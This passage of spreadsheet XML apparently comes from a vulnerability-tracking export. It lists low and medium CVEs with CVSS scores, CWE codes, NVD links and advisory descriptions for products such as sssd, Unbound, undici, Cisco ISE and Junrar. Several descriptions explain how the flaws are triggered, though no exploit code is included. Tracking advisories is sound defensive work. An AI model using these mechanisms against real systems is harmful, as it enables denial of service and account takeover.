        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1379" s="5" t="inlineStr"/>
      <c r="H1379" s="5" t="inlineStr"/>
      <c r="I1379" s="5" t="inlineStr"/>
      <c r="J1379" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K1379" s="5" t="inlineStr"/>
      <c r="L1379" s="5" t="inlineStr"/>
      <c r="M1379" s="5" t="inlineStr"/>
      <c r="N1379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1379" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1379" s="5" t="inlineStr"/>
      <c r="Q1379" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R1379" s="5" t="inlineStr">
        <is>
          <t>The OAuth authorization endpoint in Jenkins Bitbucket Server Integration Plugin 6.0.1 and earlier reads the `oauth_callback` URL from the submitted form rather than from the server-side stored request token, allowing attackers to hijack the OAuth flow and obtain an access token on behalf of the victim.</t>
        </is>
      </c>
      <c r="S1379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92138</t>
        </is>
      </c>
    </row>
    <row r="1380">
      <c r="A1380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92814</t>
        </is>
      </c>
      <c r="D1380" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1380" s="5" t="inlineStr"/>
      <c r="H1380" s="5" t="inlineStr"/>
      <c r="I1380" s="5" t="inlineStr"/>
      <c r="J1380" s="5" t="inlineStr"/>
      <c r="K1380" s="5" t="inlineStr"/>
      <c r="L1380" s="5" t="inlineStr"/>
      <c r="M1380" s="5" t="inlineStr"/>
      <c r="N1380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1380" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1380" s="5" t="inlineStr"/>
      <c r="Q1380" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1380" s="5" t="inlineStr">
        <is>
          <t>changedetection.io through 0.60.6 fails to escape the scraped page title in HTML notifications, allowing arbitrary markup injection. Attackers can place malicious markup in monitored page titles that reaches notification channels like email and Telegram as live content when the watch_title token is used in templates.</t>
        </is>
      </c>
      <c r="S1380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92814</t>
        </is>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1381" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82783</t>
        </is>
      </c>
      <c r="D1381" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E1381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1381" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1381" s="5" t="inlineStr"/>
      <c r="H1381" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1381" s="5" t="inlineStr"/>
      <c r="J1381" s="5" t="inlineStr"/>
      <c r="K1381" s="5" t="inlineStr"/>
      <c r="L1381" s="5" t="inlineStr"/>
      <c r="M1381" s="5" t="inlineStr"/>
      <c r="N1381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1381" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1381" s="5" t="inlineStr"/>
      <c r="Q1381" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="R1381" s="5" t="inlineStr">
        <is>
          <t>Plaintext storage of a password issue exists in CONPROSYS nano Series . If this vulnerability is exploited, an attacker with physical access to the product may obtain credentials.</t>
        </is>
      </c>
      <c r="S1381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82783</t>
        </is>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1382" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90463</t>
        </is>
      </c>
      <c r="D1382" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E1382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1382" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1382" s="5" t="inlineStr"/>
      <c r="H1382" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1382" s="5" t="inlineStr"/>
      <c r="J1382" s="5" t="inlineStr"/>
      <c r="K1382" s="5" t="inlineStr"/>
      <c r="L1382" s="5" t="inlineStr"/>
      <c r="M1382" s="5" t="inlineStr"/>
      <c r="N1382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1382" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1382" s="5" t="inlineStr"/>
      <c r="Q1382" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1382" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the sssd NSS responder. This input validation vulnerability allows a local attacker, by sending specially crafted service lookup requests to the NSS responder's UNIX socket, to cause an out-of-bounds read. This out-of-bounds read may lead to a denial of service (DoS) by crashing the NSS responder process. While unprivileged local clients can typically reach the socket, there is no evidence of privilege escalation or reliable data disclosure.</t>
        </is>
      </c>
      <c r="S1382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90463</t>
        </is>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1383" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90994</t>
        </is>
      </c>
      <c r="D1383" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E1383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1383" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1383" s="5" t="inlineStr"/>
      <c r="H1383" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1383" s="5" t="inlineStr"/>
      <c r="J1383" s="5" t="inlineStr"/>
      <c r="K1383" s="5" t="inlineStr"/>
      <c r="L1383" s="5" t="inlineStr"/>
      <c r="M1383" s="5" t="inlineStr"/>
      <c r="N1383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1383" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1383" s="5" t="inlineStr"/>
      <c r="Q1383" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1383" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in sssd, specifically within the PAM (Pluggable Authentication Modules) responder's protocol v1 parser, pam_parse_in_data(). A local client with access to the PAM responder's UNIX socket can exploit this by negotiating protocol v1 and sending an empty or truncated PAM request body. This can trigger an out-of-bounds read, potentially causing the PAM responder to terminate or restart, leading to a local denial of service.</t>
        </is>
      </c>
      <c r="S1383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90994</t>
        </is>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1384" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90996</t>
        </is>
      </c>
      <c r="D1384" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E1384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1384" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1384" s="5" t="inlineStr"/>
      <c r="H1384" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1384" s="5" t="inlineStr"/>
      <c r="J1384" s="5" t="inlineStr"/>
      <c r="K1384" s="5" t="inlineStr"/>
      <c r="L1384" s="5" t="inlineStr"/>
      <c r="M1384" s="5" t="inlineStr"/>
      <c r="N1384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1384" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1384" s="5" t="inlineStr"/>
      <c r="Q1384" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R1384" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in sssd. A local unprivileged user could send a specially crafted request with a zero-length body to the Network Security Services (NSS) responder. This could lead to a denial-of-service condition, causing the NSS responder to become unstable or terminate. This vulnerability affects the availability of the system responder.</t>
        </is>
      </c>
      <c r="S1384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90996</t>
        </is>
      </c>
    </row>
    <row r="1385">
      <c r="A1385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20071</t>
        </is>
      </c>
      <c r="D1385" s="5" t="n">
        <v>3.8</v>
      </c>
      <c r="E1385" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1385" s="5" t="inlineStr"/>
      <c r="H1385" s="5" t="inlineStr"/>
      <c r="I1385" s="5" t="inlineStr"/>
      <c r="J1385" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1385" s="5" t="inlineStr"/>
      <c r="L1385" s="5" t="inlineStr"/>
      <c r="M1385" s="5" t="inlineStr"/>
      <c r="N1385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1385" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1385" s="5" t="inlineStr"/>
      <c r="Q1385" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R1385" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the SSID bring-your-own-device (BYOD) onboarding workflow of Cisco ISE could allow an unauthenticated, adjacent attacker to hijack the onboarding session of&amp;nbsp;another user and access protected 802.1X networks. &amp;nbsp;
This vulnerability is due to insufficient authentication checks that are performed while a user is being onboarded. An attacker could exploit this vulnerability by spoofing the legitimate user and triggering&amp;nbsp;a redirection to the guest web portal. A successful exploit could allow the attacker to take over the user session and gain access to the protected 802.1X network.</t>
        </is>
      </c>
      <c r="S1385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20071</t>
        </is>
      </c>
    </row>
    <row r="1386">
      <c r="A1386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87026</t>
        </is>
      </c>
      <c r="D1386" s="5" t="n">
        <v>3.8</v>
      </c>
      <c r="E1386" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1386" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1386" s="5" t="inlineStr"/>
      <c r="H1386" s="5" t="inlineStr"/>
      <c r="I1386" s="5" t="inlineStr"/>
      <c r="J1386" s="5" t="inlineStr"/>
      <c r="K1386" s="5" t="inlineStr"/>
      <c r="L1386" s="5" t="inlineStr"/>
      <c r="M1386" s="5" t="inlineStr"/>
      <c r="N1386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1386" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1386" s="5" t="inlineStr"/>
      <c r="Q1386" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1386" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Threat Response.</t>
        </is>
      </c>
      <c r="S1386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87026</t>
        </is>
      </c>
    </row>
    <row r="1387">
      <c r="A1387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1387" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18540</t>
        </is>
      </c>
      <c r="D1387" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1387" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1387" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G1387" s="5" t="inlineStr"/>
      <c r="H1387" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1387" s="5" t="inlineStr"/>
      <c r="J1387" s="5" t="inlineStr"/>
      <c r="K1387" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="L1387" s="5" t="inlineStr"/>
      <c r="M1387" s="5" t="inlineStr"/>
      <c r="N1387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1387" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1387" s="5" t="inlineStr"/>
      <c r="Q1387" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R1387" s="5" t="inlineStr">
        <is>
          <t>undici's retry interceptor can append the body of a ranged retry response to bytes already delivered from an earlier partial response while still presenting the original response's status and headers. This happens when an upstream server delivers part of a body without a trustworthy resume checkpoint, for example a non-success response whose headers were already sent or a partial-content response with an unusable content range, then closes the connection and answers the resumed range request with more bytes. As a result the response body can be longer than the Content-Length that the application observes. An application that relays such a response to a downstream HTTP/1.1 peer without normalizing the framing can emit a body that exceeds the forwarded Content-Length, and the excess bytes can be interpreted as the start of a following response, which enables downstream response splitting or desynchronization. Exploitation requires an attacker-controlled upstream server and an application that forwards the response through a framing-sensitive path. This affects undici versions before 6.28.1, from 7.0.0 up to 7.29.1, and from 8.0.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="S1387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18540</t>
        </is>
      </c>
    </row>
    <row r="1388">
      <c r="A1388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1388" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54541</t>
        </is>
      </c>
      <c r="D1388" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1388" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1388" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1388" s="5" t="inlineStr"/>
      <c r="H1388" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1388" s="5" t="inlineStr"/>
      <c r="J1388" s="5" t="inlineStr"/>
      <c r="K1388" s="5" t="inlineStr"/>
      <c r="L1388" s="5" t="inlineStr"/>
      <c r="M1388" s="5" t="inlineStr"/>
      <c r="N1388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1388" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1388" s="5" t="inlineStr"/>
      <c r="Q1388" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R1388" s="5" t="inlineStr">
        <is>
          <t>Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to 1.6.0, a malicious state-sync peer can crash a syncing node by sending a crafted TrieChunk proof containing two TrieProofNode values with identical keys. TrieProof::verify calls TrieProofNode::child_index in primitives/src/trie/trie_proof_node.rs, where is_prefix_of accepts equal keys and KeyNibbles::get is called at the key length, returns None, and is unconditionally unwrapped. Untrusted ResponseChunk data reaches commit_chunks, put_chunk, and proof.verify before cryptographic proof validation, so the attacker does not need a valid proof. Exploitation requires the attacker to be selected as the victim's sync peer during state sync, and the resulting panic is transient because the node restarts and resynchronizes. This issue is fixed in version 1.6.0.</t>
        </is>
      </c>
      <c r="S1388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54541</t>
        </is>
      </c>
    </row>
    <row r="1389">
      <c r="A1389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69200</t>
        </is>
      </c>
      <c r="D1389" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1389" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1389" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1389" s="5" t="inlineStr"/>
      <c r="H1389" s="5" t="inlineStr"/>
      <c r="I1389" s="5" t="inlineStr"/>
      <c r="J1389" s="5" t="inlineStr"/>
      <c r="K1389" s="5" t="inlineStr"/>
      <c r="L1389" s="5" t="inlineStr"/>
      <c r="M1389" s="5" t="inlineStr"/>
      <c r="N1389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1389" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1389" s="5" t="inlineStr"/>
      <c r="Q1389" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R1389" s="5" t="inlineStr">
        <is>
          <t>node-opcua</t>
        </is>
      </c>
      <c r="S1389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69200</t>
        </is>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77860</t>
        </is>
      </c>
      <c r="D1390" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1390" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1390" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G1390" s="5" t="inlineStr"/>
      <c r="H1390" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1390" s="5" t="inlineStr"/>
      <c r="J1390" s="5" t="inlineStr"/>
      <c r="K1390" s="5" t="inlineStr"/>
      <c r="L1390" s="5" t="inlineStr"/>
      <c r="M1390" s="5" t="inlineStr"/>
      <c r="N1390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1390" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1390" s="5" t="inlineStr"/>
      <c r="Q1390" s="5" t="inlineStr">
        <is>
          <t>CWE-675</t>
        </is>
      </c>
      <c r="R1390" s="5" t="inlineStr">
        <is>
          <t>In NLnetLabs Unbound 1.20.0 up to and including 1.26.0, a vulnerability on the 'serve-expired' code path can cause a double decrement on the 'wait-limit' counter per client IP essentially bypassing one of the counter measures that was introduced for DNSBomb (CVE-2024-33655). A malicious actor can exploit this by controlling an authoritative zone with short TTL, so cached entries expire quickly. Each 'slow' query, one the attacker's authoritative never answers, is followed by one query for an expired cached name, which is answered immediately via the 'serve-expired' path and decrements the counter twice. This second query was named 'pump'. By alternating slow queries and pumps, the attacker keeps the per-client counter at or below the configured 'wait-limit' indefinitely, and can hold an arbitrary number of pending queries from a single source IP, up to the global mesh quota (num-queries-per-thread); eventually bypassing one of the counter measures introduced for DNSBomb (CVE-2024-33655). This vulnerability is present on the 'serve-expired' code path.</t>
        </is>
      </c>
      <c r="S1390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77860</t>
        </is>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1391" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81159</t>
        </is>
      </c>
      <c r="D1391" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1391" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1391" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1391" s="5" t="inlineStr"/>
      <c r="H1391" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1391" s="5" t="inlineStr"/>
      <c r="J1391" s="5" t="inlineStr"/>
      <c r="K1391" s="5" t="inlineStr">
        <is>
          <t>centarro:commerce_cybersource</t>
        </is>
      </c>
      <c r="L1391" s="5" t="inlineStr"/>
      <c r="M1391" s="5" t="inlineStr"/>
      <c r="N1391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1391" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1391" s="5" t="inlineStr"/>
      <c r="Q1391" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="R1391" s="5" t="inlineStr">
        <is>
          <t>Observable Timing Discrepancy vulnerability in Drupal Commerce CyberSource allows Brute Force. This issue affects Commerce CyberSource versions: from 0.0.0 to 1.10.0.</t>
        </is>
      </c>
      <c r="S1391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81159</t>
        </is>
      </c>
    </row>
    <row r="1392">
      <c r="A1392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86071</t>
        </is>
      </c>
      <c r="D1392" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1392" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1392" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1392" s="5" t="inlineStr"/>
      <c r="H1392" s="5" t="inlineStr"/>
      <c r="I1392" s="5" t="inlineStr"/>
      <c r="J1392" s="5" t="inlineStr"/>
      <c r="K1392" s="5" t="inlineStr"/>
      <c r="L1392" s="5" t="inlineStr"/>
      <c r="M1392" s="5" t="inlineStr"/>
      <c r="N1392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1392" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1392" s="5" t="inlineStr"/>
      <c r="Q1392" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1392" s="5" t="inlineStr">
        <is>
          <t>Junrar is an open source Java RAR archive library. Prior to version 7.6.1, LocalFolderExtractor in src/main/java/com/github/junrar/LocalFolderExtractor.java can create directories outside the intended extraction root when processing a crafted archive entry. LocalFolderExtractor.createFile() validates only the final canonical file path, while LocalFolderExtractor.makeFile() creates intermediate path segments with unchecked mkdir() calls. An entry can therefore make the final path resolve inside the destination while causing intermediate directory creation outside it, enabling filesystem pollution or file-versus-directory squatting that can make later security-sensitive writes fail. The demonstrated impact is directory creation, not unconditional arbitrary file-content write. This issue is fixed in version 7.6.1.</t>
        </is>
      </c>
      <c r="S1392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86071</t>
        </is>
      </c>
    </row>
    <row r="1393">
      <c r="A1393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1393" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1393" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-24035</t>
        </is>
      </c>
      <c r="D1393" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1393" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1393" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1393" s="5" t="inlineStr"/>
      <c r="H1393" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1393" s="5" t="inlineStr"/>
      <c r="J1393" s="5" t="inlineStr"/>
      <c r="K1393" s="5" t="inlineStr"/>
      <c r="L1393" s="5" t="inlineStr"/>
      <c r="M1393" s="5" t="inlineStr"/>
      <c r="N1393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1393" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1393" s="5" t="inlineStr"/>
      <c r="Q1393" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="R1393" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Nagios XI before 5.9.3. The is_insecure_login_authenticated function uses a insecure timing comparison that leads to an attacker being able to bruteforce the admin password, by measuring timing differences in the comparison.</t>
        </is>
      </c>
      <c r="S1393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-24035</t>
        </is>
      </c>
    </row>
    <row r="1394">
      <c r="A1394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1394" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33970</t>
        </is>
      </c>
      <c r="D1394" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1394" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1394" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1394" s="5" t="inlineStr"/>
      <c r="H1394" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1394" s="5" t="inlineStr"/>
      <c r="J1394" s="5" t="inlineStr"/>
      <c r="K1394" s="5" t="inlineStr"/>
      <c r="L1394" s="5" t="inlineStr"/>
      <c r="M1394" s="5" t="inlineStr"/>
      <c r="N1394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1394" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1394" s="5" t="inlineStr"/>
      <c r="Q1394" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1394" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in NR RRC and L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 1680, W920, W930, W1000, and Modem 5410. In the 5G baseband, a NULL Pointer Dereference occurs when processing a malformed RRC Reconfiguration message.</t>
        </is>
      </c>
      <c r="S1394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33970</t>
        </is>
      </c>
    </row>
    <row r="1395">
      <c r="A1395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1395" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1395" s="5" t="inlineStr">
